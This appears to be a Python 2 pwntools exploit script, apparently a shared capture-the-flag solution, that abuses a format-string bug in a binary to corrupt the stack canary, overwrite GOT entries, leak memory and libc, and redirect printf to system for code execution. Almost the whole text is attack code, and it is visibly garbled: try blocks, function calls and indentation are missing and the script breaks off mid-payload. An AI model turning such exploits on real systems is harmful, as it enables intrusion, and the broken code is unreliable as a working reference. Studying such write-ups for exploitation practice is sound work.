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Created September 10, 2017 17:48
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#!/usr/bin/env python2
from pwn import *
from pwnlib import elf
from ctypes import *
context.arch = "amd64"
libc = ELF("./")
base = 0x400000
entry = 0x4005f0
welcome = 0x00400734
#welcome = 0x00400661
got_stack_fail = 0x00601020
got_puts = 0x00601018
got_unknown = 0x00601030
got_printf = 0x00601028
initial_offset = 8
canary_ptr = 8
badchars = string.whitespace
def leak_binary():
p = log.progress("leaking binary")
result = file("binary", "rb").read()
except IOError:
result = ""
while True:
addr = base + len(result)
p.status("leaking: %x", addr)
result += leak(addr)
with open("binary", "wb") as f:
def print_stack():
with context.local(log_level="ERROR"):
for i in range(0x20):
#conn = remote("", 54515)
conn = process("./test")
conn.recvline_contains("let's move")
conn.sendline(",".join("%{}$pE".format(i + x) for x in range(1)))
for x, r in enumerate(conn.recvuntil("E", drop=True).rstrip("a").split(",")):
v = ""
z = r
print "%d: %18s (%18s)" % (i + x, z, " ".join(hex(ord(c)) for c in v))
def prompt():
conn.recvline_contains("let's move")
def send(inp):
global offset
assert not any(x in badchars for x in inp), "has badchars"
assert len(inp) <= 99, "too long"
offset += 1
def cu16(x):
return c_uint16(x).value
bp = None
conn = None
info("initial setup")
while not bp or any(x in badchars for x in p64(bp)):
offset = initial_offset
if conn: conn.close()
conn = remote("", 54515)
# make a loop so we can send more
a = (welcome & 0xFF) << 8
b = (welcome >> 8) & 0xFFFF
print "%#x %#x" % (a, b)
0x0: [
"%{}$n".format(offset + canary_ptr), # corrupt the canary
"%{}$lln".format(offset + 6), # null out the canary fail function
"%{}c%{}$hn".format(a, offset + 5), # write lower byte of welcome
"%{}c%{}$hn".format(cu16(b - a), offset + 6), # write 2nd and 3rd byte of welcome
5 * 8: [
# +1/-1 because 0x20 is a bad byte (space)
p64(got_stack_fail - 1),
p64(got_stack_fail + 1),
success("created input loop")
# determine stack base
send("----%{}$llx----".format(offset + canary_ptr))
ptr = int(conn.recvuntil("----", drop=True), 16)
bp = ptr + 2
success("leaked base pointer without bad chars: %#x", bp)
def put_value(idx,val):
val_good = "".join(x if x not in badchars else "X" for x in val)
8 * idx: val_good,
# fixup badchars
location = bp - (14 - idx) * 8
for idx, char in enumerate(val):
if char not in badchars: continue
0: "%{}c%{}$hhn".format(ord(char), offset + 3),
3 * 8: p64(location + idx),
def leak(addr):
put_value(11, p64(addr))
# leak
send("----%{}$s----".format(offset + 11))
return conn.recvuntil("----", drop=True) + "\0"
libc.address += leak.u64(got_puts) - libc.symbols.puts
success("libc base: %#x", libc.address)
put_value(8, flat([
p64(got_printf + 2),
p64(got_printf + 4),
p64(got_printf + 6),
payload = ""
addr = p64(welcome)
written = 0
for idx, v in enumerate([u16(addr[x:x+2]) for x in range(0, 8, 2)]):
payload += "%{}c%{}$hn".format(cu16(v - written), idx+8+offset)
written = v
addr = libc.symbols.system
a = addr & 0xFFFF
b = (addr >> 16) & 0xFFFF
c = (addr >> 32) & 0xFFFF
d = (addr >> 48) & 0xFFFF
"%{}$lln".format(offset + 8),
"%{}c%{}$hn".format(a, offset + 8),
"%{}c%{}$hn".format(cu16(b - a), offset + 9),
"%{}c%{}$hn".format(cu16(c - b), offset + 10),
"%{}c%{}$hn".format(cu16(d - c), offset + 11),
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